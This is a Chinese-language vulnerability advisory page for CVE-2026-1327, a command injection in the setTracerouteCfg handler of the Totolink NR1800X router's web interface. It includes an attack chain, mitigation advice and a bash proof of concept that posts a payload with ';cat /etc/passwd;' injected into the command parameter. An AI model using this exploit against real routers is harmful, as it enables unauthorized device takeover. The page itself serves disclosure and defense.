IPBUF安全漏洞报告
English
CVE-2026-1327 CVSS 6.3 中危

CVE-2026-1327 Totolink NR1800X setTracerouteCfg命令注入漏洞

披露日期: 2026-01-22

漏洞信息

漏洞编号
CVE-2026-1327
漏洞类型
命令注入
CVSS评分
6.3 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Totolink NR1800X

相关标签

命令注入CVE-2026-1327Totolink NR1800X路由器漏洞Web管理界面CGI远程代码执行中危漏洞

漏洞概述

CVE-2026-1327是影响Totolink NR1800X路由器9.1.0u.6279_B20210910固件版本的安全漏洞。该漏洞存在于Web管理界面的cgi-bin/cstecgi.cgi文件中,具体位于setTracerouteCfg函数。由于该函数对用户提交的command参数缺乏有效的输入过滤和验证,攻击者可以通过构造恶意的POST请求,在路由器系统上执行任意命令。此漏洞具有远程利用特性,攻击者无需高权限即可发起攻击,且无需用户交互。漏洞已被公开披露,存在被恶意利用的风险。成功利用此漏洞可导致路由器被完全控制,攻击者可窃取网络配置信息、监听网络流量或将其作为僵尸网络的一部分。

技术细节

漏洞根源在于Totolink NR1800X路由器的Web管理接口对用户输入的命令参数缺乏安全过滤。攻击者通过向/cgi-bin/cstecgi.cgi端点发送POST请求,在action参数设置为setTracerouteCfg的同时,在command参数中注入系统命令。由于后端CGI程序直接将用户输入拼接到系统命令执行语句中,未进行任何转义或参数化处理,导致注入的命令被shell解释执行。攻击者可利用管道符(|)、分号(;)或反引号(``)等shell特殊字符实现命令链接,执行任意系统操作,包括读取敏感配置文件、开启远程访问服务或植入后门程序。

攻击链分析

STEP 1
步骤1
攻击者识别目标Totolink NR1800X路由器并访问其Web管理界面
STEP 2
步骤2
攻击者向/cgi-bin/cstecgi.cgi端点发送构造的POST请求,action参数设为setTracerouteCfg
STEP 3
步骤3
在command参数中注入恶意命令,如使用分号或管道符链接系统命令
STEP 4
步骤4
后端CGI程序未对输入进行过滤,直接将包含恶意代码的command参数传递给系统shell执行
STEP 5
步骤5
攻击者成功在路由器上执行任意系统命令,可获取root权限完全控制设备

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
#!/bin/bash # CVE-2026-1327 PoC - Totolink NR1800X Command Injection # Target: /cgi-bin/cstecgi.cgi TARGET="http://192.168.1.1" echo "[*] CVE-2026-1327 PoC for Totolink NR1800X" echo "[*] Vulnerability: Command Injection in setTracerouteCfg" # PoC to trigger the vulnerability - inject command to read /etc/passwd PAYLOAD='{"action":"setTracerouteCfg","command":";cat /etc/passwd;"}' echo "[+] Sending malicious POST request..." curl -s -X POST "$TARGET/cgi-bin/cstecgi.cgi" \ -H "Content-Type: application/json" \ -d "$PAYLOAD" \ -i | head -50 echo "" echo "[!] If vulnerable, /etc/passwd content should be displayed"

影响范围

Totolink NR1800X 9.1.0u.6279_B20210910

防御指南

临时缓解措施
在官方补丁发布前,建议通过防火墙限制对路由器Web管理界面(80/443端口)的访问,仅允许受信任的IP地址访问管理接口。同时定期检查设备运行状态,关注厂商安全公告,及时更新固件版本。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表